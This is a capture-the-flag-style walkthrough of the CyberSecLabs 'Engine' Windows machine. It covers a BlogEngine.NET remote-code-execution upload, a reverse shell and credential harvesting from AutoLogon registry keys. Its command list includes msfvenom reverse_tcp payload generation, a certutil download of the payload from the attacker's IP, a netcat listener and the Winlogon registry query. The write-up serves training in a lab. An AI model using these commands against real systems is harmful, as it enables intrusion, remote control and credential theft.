Premise

Note: Due to reasons connected to the lab, the credentials of the windows system didn’t appear when I re-produced the video.
In this walk- through, we demonstrated basic enumeration and exploitation of a web server installed on Windows. Then we found that the windows system stores credentials in the Auto-Login registry keys which enabled us to escalate our privileges.

Machine Name: Engine

Difficulty:  Medium

Skills Learned

  • Web server enumeration and exploitation
  • Windows Auto Login Registry Exploitation

In this video, I’m going to walk you through how I tackled the “Engine” machine from Cyberseclabs. It was a fun challenge that involved finding a vulnerability in a web application, getting a reverse shell, and then trying to escalate my privileges to get full control of the machine.

Finding a Way In

My first step was to scan the machine to see what services were running. I found an HTTP server and an SMB server. I tried to see if I could access any of the SMB shares, but I was denied access, so I moved on to the web server.

When I accessed the web server, I was greeted with the default IIS page. I didn’t see any obvious directories, so I decided to use a tool to look for hidden ones. I found a /blog directory, which led me to a “BlogEngine.NET” application. I knew that this was a good place to start looking for vulnerabilities.

Exploiting the Blog

I used a tool called searchsploit to look for exploits for BlogEngine.NET and found one for a “Directory Traversal Remote Code Execution” vulnerability. This vulnerability allows an attacker to upload a malicious file and then execute it by tricking the application into looking for it in the wrong place.

I downloaded the exploit, which was an .ascx file, and modified it to include my IP address and a port number for the reverse shell. I then logged into the blog application using the default credentials “admin:admin” and uploaded the exploit file.

After a bit of trial and error, I figured out that I needed to rename the exploit file to postview.ascx for it to work. Once I did that, I was able to trigger the vulnerability by navigating to a specific URL, which gave me a reverse shell on the machine!

Getting a Better Shell

The initial shell I got was a bit unstable, so I decided to create a more powerful one using Metasploit. I generated a Meterpreter payload, which is a type of shell that gives you a lot of control over the target machine, and downloaded it to the target machine using certutil.

I then set up a listener on my machine to catch the Meterpreter session. After a bit of troubleshooting, I was able to execute the payload and get a stable Meterpreter session. I then used the sysinfo command to confirm that the target machine was running Windows Server 2012 R2.

Trying to Escalate Privileges

My next goal was to escalate my privileges to become the administrator of the machine. I knew that a common way to do this on Windows is to look for credentials that are stored in the registry. I used a Metasploit module to search for “AutoLogon” credentials, which are sometimes stored in clear text.

The module successfully found the administrator’s username and password! I then tried to use these credentials to log in using a tool called evil-winrm, but I kept getting an authorization error. I’m not sure why this was happening, as the credentials had worked for me before. It’s possible that there was an issue with the lab environment at the time.

Even though I wasn’t able to log in as the administrator, I was still able to demonstrate the process of finding and exploiting a vulnerability, getting a reverse shell, and then finding the credentials to escalate my privileges.

Commands I Used

Here are some of the key commands I used during this process:

  • Scanning for services: nmap
  • Listing SMB shares: smbclient -L //172.31.1.16
  • Searching for exploits: searchsploit blogengine
  • Setting up a netcat listener: nc -lvp 4445
  • Generating a Meterpreter payload: sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.0.16 LPORT=4546 -f exe -o blog.exe
  • Starting a Python web server: python3 -m http.server
  • Downloading a file to the target machine: certutil.exe -urlcache -f http://10.10.0.16:8000/blog.exe blog.exe
  • Starting the Metasploit console: msfconsole
  • Using the multi-handler exploit: use exploit/multi/handler
  • Setting the payload: set payload windows/meterpreter/reverse_tcp
  • Getting system information: sysinfo
  • Searching for AutoLogon credentials: search autologon
  • Using the windows_autologon module: use post/windows/gather/credentials/windows_autologon
  • Logging in with evil-winrm: evil-winrm -i 172.31.1.16 -u administrator -p <password>
  • Querying the registry: reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

Video Walk-through

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles